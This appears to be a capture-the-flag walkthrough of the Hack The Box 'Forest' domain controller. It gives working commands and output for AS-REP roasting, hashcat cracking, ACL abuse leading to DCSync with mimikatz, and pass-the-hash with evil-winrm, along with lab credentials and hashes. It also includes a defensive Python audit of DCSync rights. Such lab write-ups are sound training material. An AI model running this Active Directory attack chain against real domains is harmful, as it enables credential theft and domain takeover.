Hack the Box Walkthrough: Forest


Overview

This post provides a walkthrough of the Forest system on Hack The Box. This walkthrough, in its entirety, is a spoiler.

I create these walkthroughs as documentation for myself while working through a system; excuse any brevity or lack of formality. I’ve uploaded this walkthrough to help those that may be stuck.

Service Enumeration

To kick things off, we start with some service discovery to figure out what is actually running on this box.

Nmap Scan

# nmap -A -Pn -n -T5 -p1-65535 10.10.10.161
[snip]
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-25 21:08:32Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49906/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/25%Time=5DB362BB%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2019-10-25T14:09:55-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-10-25T21:09:54
|_  start_date: 2019-10-24T22:14:17
[snip]

The SMB service looks interesting, so I decided to perform some light enumeration.

SMB User Enum

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.10.161:445      - HTB [ Administrator, Guest, krbtgt, DefaultAccount, $331000-VK4ADACQNUCA, SM_2c8eef0a09b545acb, SM_ca8c2ed5bdab4dc9b, SM_75a538d3025e4db9a, SM_681f53d4942840e18, SM_1b41c9286325456bb, SM_9b69f1b9d2cc45549, SM_7c96b981967141ebb, SM_c75ee099d0a64c91b, SM_1ffab36a2f5f479cb, HealthMailboxc3d7722, HealthMailboxfc9daad, HealthMailboxc0a90c9, HealthMailbox670628e, HealthMailbox968e74d, HealthMailbox6ded678, HealthMailbox83d6781, HealthMailboxfd87238, HealthMailboxb01ac64, HealthMailbox7108a4e, HealthMailbox0659cc1, sebastien, lucinda, svc-alfresco, andy, mark, santi ] ( LockoutTries=0 PasswordMin=7 )

Named Pipe Enum

msf5 auxiliary(scanner/smb/pipe_auditor) > run

[+] 10.10.10.161:445      - Pipes: \netlogon, \lsarpc, \samr
[*] 10.10.10.161:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Domain User Enum

# rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Group Membership

rpcclient $> queryusergroups 0x478
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x479
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47a
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47e
	group rid:[0x201] attr:[0x7]
rpcclient $> querygroup 0x201
	Group Name:	Domain Users
	Description:	All domain users
	Group Attribute:7
	Num Members:30
rpcclient $> queryusergroups 0x479
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47a
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47b
	group rid:[0x201] attr:[0x7]
	group rid:[0x47c] attr:[0x7]
rpcclient $> queryusergroups 0x47e
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47f
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x480
	group rid:[0x201] attr:[0x7]
rpcclient $> querygroup 0x201
	Group Name:	Domain Users
	Description:	All domain users
	Group Attribute:7
	Num Members:30
rpcclient $> querygroup 0x47c
	Group Name:	Service Accounts
	Description:	
	Group Attribute:7
	Num Members:1

Getting User Flag

I noticed that one of the users was called svc-alfresco, and the rpcclient output above confirmed it is the only member of the Service Accounts group. This got me thinking that the challenge was likely focused on Kerberos-related attacks.

Using Impacket's GetNPUsers.py we can identify any accounts that have the UF_DONT_REQUIRE_PREAUTH bit set. When pre-authentication is not required, the KDC will hand an AS-REP to anyone who asks for that user, and the AS-REP's enc-part is encrypted with a key derived from the user's password (for etype 23, RC4-HMAC, that key is the NT hash), so the blob can be cracked offline without ever authenticating.

ASREP Roast

# ./GetNPUsers.py -usersfile /root/users -dc-ip 10.10.10.161  -no-pass -request -outputfile out htb.local/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
root@htbvm:~/Impacket/examples# cat out 
$krb5asrep$23$svc-alfresco@HTB.LOCAL:2daf4fae907f54b4e3630829f24db9a9$d1e086a6ff6d035b2c2c74acac12b02e12d3e8637b1c34361734e949d2a51c77f81affcffc4a275d8f5395ac6ea1861a8636f6f5e67dfbdac116e551063465db88bd824b439d195f3780cdea6713fc8b4183407dd28ea74e27ff316d2ef4dee40a9d8fc85f2d27345ea1bf692b76e75b930de410f4b72cbace7b4d4c51b5e059b31692082f703fdfdcae8cc60aad8c060348a3c6d7ddb55fd39fd5a19d8ec18321d80014fc2fa98bf16b88b7ca6fc41658e723f2c9b5bbf5a0e4387c667cbac7fd0aaf6653ff24427c24fd2e6b3966d2dc220ea0c6108190d200fd39ce4eb0d184ae1bb5dc69
root@htbvm:~/Impacket/examples# 

As seen above, GetNPUsers.py obtained an AS-REP for svc-alfresco and wrote its encrypted part (the 16-byte checksum followed by the ciphertext) to the output file in the $krb5asrep$23$ format that hashcat understands. The two KDC_ERR_CLIENT_REVOKED errors come from entries in the user list whose accounts are disabled or locked. Note that the blob cracked in the next section was captured in a separate run and its checksum and ciphertext differ from the one above: every AS-REP is freshly encrypted with a random confounder, so each request yields a different crackable blob for the same password.

Cracking TGT Hash

# hashcat -O -m 18200 -a 0 --self-test-disable -o cracked_asrep asrep Downloads/rockyou.txt
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:df2b0d4842f6d8...4a8080
Time.Started.....: Fri Oct 25 23:15:21 2019 (2 secs)
Time.Estimated...: Fri Oct 25 23:15:23 2019 (0 secs)
Guess.Base.......: File (Downloads/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:   214.7 kH/s (9.63ms) @ Accel:4 Loops:1 Thr:64 Vec:1
Speed.#3.........:  2925.3 kH/s (7.22ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Speed.#*.........:  3140.0 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4215737/14344384 (29.39%)
Rejected.........: 953/4215737 (0.02%)
Restore.Point....: 3935130/14344384 (27.43%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#2....: robinhood1997 -> rob allen
Candidates.#3....: scoobyddo2 -> robinhood2009

Started: Fri Oct 25 23:15:20 2019
Stopped: Fri Oct 25 23:15:24 2019

 milos  ~  cat cracked_asrep
$krb5asrep$23$svc-alfresco@HTB.LOCAL:df2b0d4842f6d88e468e5e6f96911621$6e91de1fe97b51f438c05f253696945c3c43447cbb409a61489c7f54b59790503df55eed966ac2588c5a0e269fb464f0efe5dbdf9d23f147b65e346b3386e9d0e078775d925cee56d19699ca4943ff81eb6e0bfde3312997d67c8149908c21becb269e150fd2742bcbd588ce93b926fb774a2e5b0259323bcfb95cacc0668558dd766c37af25c4caef748cde31d06c4b02a8d9af775e272f5894eebc7832eaf1152a26badb8839ca79f2e4ca41aed9103b5b703f6452dcd0f65ebb4885e44241419192e655deb2861062dc8b50a4afe613bcd520259856e1b93fb61cd347666e27e24d4a8080:s3rvice
$krb5asrep$23$svc-alfresco@HTB.LOCAL:df2b0d4842f6d88e468e5e6f96911621$6e91de1fe97b51f438c05f253696945c3c43447cbb409a61489c7f54b59790503df55eed966ac2588c5a0e269fb464f0efe5dbdf9d23f147b65e346b3386e9d0e078775d925cee56d19699ca4943ff81eb6e0bfde3312997d67c8149908c21becb269e150fd2742bcbd588ce93b926fb774a2e5b0259323bcfb95cacc0668558dd766c37af25c4caef748cde31d06c4b02a8d9af775e272f5894eebc7832eaf1152a26badb8839ca79f2e4ca41aed9103b5b703f6452dcd0f65ebb4885e44241419192e655deb2861062dc8b50a4afe613bcd520259856e1b93fb61cd347666e27e24d4a8080:s3rvice
 milos  ~ 

Earlier during port scanning I identified the presence of WinRM (5985/tcp) so I leveraged evil-winrm (https://github.com/Hackplayers/evil-winrm) to get a shell on the box:

# ruby evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p 's3rvice' 
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
    Directory: C:\Users\svc-alfresco\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
e5e4e47ae7022664cda6eb013fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

This allowed me to successfully gain access to the user flag.

Getting Root Flag

After spending some time looking through the system, I didn't see anything too interesting: no interesting software or services installed, no interesting processes. I had a hunch that, given this is a DC, the idea was to target Active Directory misconfigurations for privilege escalation.

To get better insight, I used SharpHound to enumerate AD and give me better visibility into privilege escalation paths.

SharpHound Enumeration

This was done from a Windows VM. I tried using PowerShell for Linux, but it failed citing missing DLLs, so I didn't spend much time going further down that route.

PS C:\USers\IEUser\Downloads> .\SharpHound.exe --CollectionMethod All --Domain "htb.local" --DomainController "forest.htb.local" --LDAPUser "svc-alfresco" --LDAPPass "s3rvice"
Initializing BloodHound at 7:38 PM on 10/27/2019
Manually specifying a domain controller will likely result in data loss. Only use this for performance/opsec reasons
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Starting Enumeration for htb.local
Status: 123 objects enumerated (+123 6.833333/s --- Using 55 MB RAM )
Finished enumeration for htb.local in 00:00:18.0926725
1 hosts failed ping. 0 hosts timedout.

Compressing data to .\20191027193846_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

BloodHound Output

The collected data was visualized in the BloodHound UI using the "Shortest Path to Domain Admin" query. In that graph, the user account on the far right is the htb\svc-alfresco account that we had previously compromised.

As the graph shows, svc-alfresco has GenericAll over the Exchange Windows Permissions group, and that group in turn has WriteDacl on the domain object. GenericAll on a group lets us add members to it, so if we add svc-alfresco to Exchange Windows Permissions we inherit WriteDacl on the domain object and can append whatever ACE we like to its DACL.

Since we are already in our Windows attack VM, we might as well continue from the same box. Earlier we discovered that svc-alfresco could use WinRM to get a shell, so we connect through WinRM again, this time using the built-in PowerShell remoting cmdlets.

First we get the credential for our user (svc-alfresco/s3rvice) and then we instantiate and enter the Remote PowerShell Session.

Privilege Escalation via ACL / ACE Abuse

PS C:\Windows\system32> $cred = Get-Credential

cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
PS C:\Windows\system32> New-PSSession -ComputerName "10.10.10.161" -Authentication Negotiate -Credential $cred

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
 21 WinRM21         10.10.10.161    RemoteMachine   Opened        Microsoft.PowerShell     Available


PS C:\Windows\system32> Enter-PSSession 21
[10.10.10.161]: PS C:\Users\svc-alfresco\Documents> hostname
FOREST
[10.10.10.161]: PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
[10.10.10.161]: PS C:\Users\svc-alfresco\Documents>

From here we can modify the domain object's DACL to grant our own account GenericAll. GenericAll covers the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, which is exactly what a DCSync needs.

[10.10.10.161]: PS C:\> Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco
[10.10.10.161]: PS C:\> $acl = get-acl "ad:DC=htb,DC=local"
[10.10.10.161]: PS C:\> $id = [Security.Principal.WindowsIdentity]::GetCurrent()
[10.10.10.161]: PS C:\> $user = Get-ADUser -Identity $id.User
[10.10.10.161]: PS C:\> $sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
[10.10.10.161]: PS C:\> $identity = [System.Security.Principal.IdentityReference] $sid
[10.10.10.161]: PS C:\> $adRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll"
[10.10.10.161]: PS C:\> $type = [System.Security.AccessControl.AccessControlType] "Allow"
[10.10.10.161]: PS C:\> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
[10.10.10.161]: PS C:\> $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$inheritanceType
[10.10.10.161]: PS C:\> $acl.AddAccessRule($ace)
[10.10.10.161]: PS C:\> Set-acl -aclobject $acl "ad:DC=htb,DC=local"
[10.10.10.161]: PS C:\> Get-ADGroupMember -Identity "Exchange Windows Permissions"
distinguishedName : CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
name              : svc-alfresco
objectClass       : user
objectGUID        : 58a51302-4c7c-4686-9502-d3ada3afaef1
SamAccountName    : svc-alfresco
SID               : S-1-5-21-3072663084-364016917-1341370565-1147

distinguishedName : CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
name              : Exchange Trusted Subsystem
objectClass       : group
objectGUID        : ba27b45c-669a-4690-bdfc-ee0345e17521
SamAccountName    : Exchange Trusted Subsystem
SID               : S-1-5-21-3072663084-364016917-1341370565-1119

Interestingly enough, the group change persisted for only roughly a minute; I think there was likely some code on the DC reverting changes to make this box a bit harder. The commands above were pasted into the PowerShell session as one batch in order to beat that window.
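After Set-Acl, the check a practitioner wants is "did the ACE land, and who else on this domain can DCSync?". The following Python is an added example (not code from the original post, BloodHound or PowerView) that reads the domain head's DACL in SDDL form, which is what `(Get-Acl "ad:DC=htb,DC=local").Sddl` returns, and reports every trustee holding the rights DCSync requires, plus those holding WriteDacl/WriteOwner that let them grant those rights to themselves. The SDDL strings are constructed: the svc-alfresco SID is the one shown above, while the SID used for Exchange Windows Permissions and the -2001 account are assumed.

```python
"""Who can DCSync the htb.local domain head? Added example for this write-up
(not the post's code, nor BloodHound's or PowerView's). Feed dcsync_principals()
the string returned by (Get-Acl "ad:DC=htb,DC=local").Sddl. The SDDL below is
constructed; SIDs other than svc-alfresco's are assumed."""
import re
from collections import defaultdict

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
SVC_ALFRESCO = "S-1-5-21-3072663084-364016917-1341370565-1147"     # from the write-up
EWP = "S-1-5-21-3072663084-364016917-1341370565-1118"              # assumed SID: Exchange Windows Permissions
ONLY_GET_CHANGES = "S-1-5-21-3072663084-364016917-1341370565-2001" # assumed: holds one of the two rights

# Constructed DACL as it might look before the write-up's Set-Acl: Domain Admins
# (CR with no object GUID = all extended rights), Enterprise Domain Controllers
# (both replication GUIDs), the Exchange group with WriteDacl, and an account
# holding only Get-Changes, which is not enough for a DCSync.
SDDL_BEFORE = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRLCLOCRRCWDWOSW;;;DA)"
    f"(OA;;CR;{GET_CHANGES};;S-1-5-9)"
    f"(OA;;CR;{GET_CHANGES_ALL};;S-1-5-9)"
    f"(A;;WD;;;{EWP})"
    f"(OA;;CR;{GET_CHANGES};;{ONLY_GET_CHANGES})"
)
# After Set-Acl: .NET's ActiveDirectoryRights.GenericAll (0xF01FF) is written out as
# the explicit full-control string, not as the generic "GA" token.
SDDL_AFTER = SDDL_BEFORE + f"(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{SVC_ALFRESCO})"

HEX_RIGHTS = {0x10000000: "GA", 0x40000: "WD", 0x80000: "WO", 0x100: "CR"}


def parse_dacl(sddl: str):
    """Yield (ace_type, rights, object_guid, trustee) for every ACE in the D: component."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    for body in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        fields = body.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inh_guid, trustee = fields[:6]
        if rights.startswith("0x"):  # SDDL may carry the access mask as hex instead of tokens
            value = int(rights, 16)
            rights_set = {name for bit, name in HEX_RIGHTS.items() if value & bit}
        else:
            rights_set = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        yield ace_type, rights_set, obj_guid.lower(), trustee


def dcsync_principals(sddl: str):
    """Return (direct, escalatable): who can DCSync now, and who can grant it to themselves."""
    direct, escalatable, extended = {}, {}, defaultdict(set)
    for ace_type, rights, guid, sid in parse_dacl(sddl):
        if ace_type not in ("A", "OA"):
            continue  # deny ACEs and their ordering are ignored here; a full evaluator must honour them
        if "GA" in rights or ("CR" in rights and guid == ""):
            direct[sid] = "GenericAll / all extended rights"
        elif "CR" in rights:
            extended[sid].add(guid)
        if rights & {"WD", "WO"}:
            escalatable[sid] = "WriteDacl/WriteOwner on the domain head"
    for sid, guids in extended.items():
        if {GET_CHANGES, GET_CHANGES_ALL} <= guids and sid not in direct:
            direct[sid] = "DS-Replication-Get-Changes + Get-Changes-All"
    return direct, escalatable


if __name__ == "__main__":
    for label, sddl in (("before", SDDL_BEFORE), ("after", SDDL_AFTER)):
        direct, escalatable = dcsync_principals(sddl)
        print(label, "can DCSync:", direct)
        print(label, "can grant themselves DCSync:", escalatable)
```

Two details matter when reading real output: an account needs both replication GUIDs (or an unscoped CR / GenericAll) before DCSync works, so a single Get-Changes ACE is a false positive; and any WriteDacl or WriteOwner holder on the domain head is effectively DCSync-capable, which is exactly the Exchange Windows Permissions edge BloodHound flagged here.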

DCSync for Administrator Hash

After modifying the permissions on the domain object we can simply use mimikatz's lsadump::dcsync functionality to retrieve the hash: mimikatz asks the DC to replicate the Administrator object, just as another domain controller would, and the DC honours the request because of the replication rights we just granted ourselves.

PS C:\USers\IEUser\Downloads\mimikatz_trunk\x64> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:htb.local /user:ADministrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'ADministrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Principal Name  : Administrator@htb.local
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/18/2019 1:09:08 PM
Object Security ID   : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6

I attempted a number of online password-cracking solutions against the NTLM hash but was unsuccessful. Instead, I used the -H option of evil-winrm to pass the hash and establish a shell as Administrator, then retrieved the root flag.

root@htbvm:~/evil-winrm# ./evil-winrm.rb -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f048153f202bbb2f82622b04d79129cc
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
